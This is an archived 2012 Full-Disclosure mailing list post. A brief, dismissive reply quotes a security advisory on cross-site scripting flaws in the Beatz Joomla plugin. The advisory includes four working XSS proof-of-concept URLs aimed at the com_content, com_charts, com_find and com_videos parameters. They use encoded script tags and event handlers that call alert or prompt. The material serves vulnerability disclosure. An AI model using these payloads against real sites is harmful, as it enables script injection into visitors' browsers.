lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Date: Mon, 16 Apr 2012 10:39:22 +0200
From: David3 Gonnella <netevil@...kers.it>
To: YGN Ethical Hacker Group <lists@...g.net>
Cc: full-disclosure <full-disclosure@...ts.grok.org.uk>
Subject: Re: Joomla! Plugin - Beatz 1.x <= Multiple Cross
 Site Scripting Vulnerabilities

poc on localhost is a bit unreachable...  fbvfdjkh3ruifwqebdf



On 04/15/12 18:39, YGN Ethical Hacker Group wrote:
> 1. OVERVIEW
> 
> Beatz 1.x versions are vulnerable to Cross Site Scripting.
> 
> 
> 2. BACKGROUND
> 
> Beatz is a set of powerful Social Networking Script Joomla! 1.5
> plugins that allows you to start your own favourite artist band
> website. Although it is just a Joomla! plugin, it comes with full
> Joolma! bundle for ease of use and installation.
> 
> 
> 3. VULNERABILITY DESCRIPTION
> 
> Multiple parameters were not properly sanitized upon submission, which
> allows attacker to conduct Cross Site Scripting attack. This may allow
> an attacker to create a specially crafted URL that would execute
> arbitrary script code in a victim's browser. The vulnerable plugins
> include: com_find, com_charts and com_videos.
> 
> 
> 4. VERSIONS AFFECTED
> 
> Tested in 1.x versions
> 
> 
> 5. PROOF-OF-CONCEPT/EXPLOIT
> 
> == Generic Joomla! 1.5 Double Encoding XSS
> 
> http://localhost/beatz/?option=com_content&view=frontpage&limitstart=5&%2522%253e%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2f%2558%2553%2553%2f%2529%253c%2f%2573%2563%2572%2569%2570%2574%253e=1
> 
> == com_charts (parameter: do)
> 
> http://localhost/beatz/index.php?option=com_charts&view=charts&Itemid=76&chartkeyword=Acoustic&do=all%22%20style%3dbackground-image:url('javascript:alert(/XSS/)');width:1000px;height:1000px;display:block;"%20x=%22&option=com_charts
> 
> == com_find (parameter: keyword)
> 
> http://localhost/beatz/index.php?do=listAll&keyword=++Search"><img+src=0+onerror=prompt(/XSS/)>&option=com_find
> 
> == com_videos (parameter: video_keyword)
> 
> http://localhost/beatz/index.php?option=com_videos&view=videos&Itemid=59&video_keyword="+style="width:1000px;height:1000px;position:absolute;left:0;top:0"+onmouseover="alert(/xss/)&search=Search
> 
> 
> 6. SOLUTION
> 
> The vendor hasn't released the fixed yet.
> 
> 
> 7. VENDOR
> 
> Cogzidel Technologies Pvt Ltd.
> http://www.cogzidel.com/
> 
> 
> 8. CREDIT
> 
> Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.
> 
> 
> 9. DISCLOSURE TIME-LINE
> 
> 2011-03-01: notified vendor
> 2012-04-15: vulnerability disclosed
> 
> 
> 10. REFERENCES
> 
> Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bbeatz_1.x%5D_xss
> 
> #yehg [2012-04-15]
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 


Download attachment "0xB95E8B49.asc" of type "application/pgp-keys" (1737 bytes)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ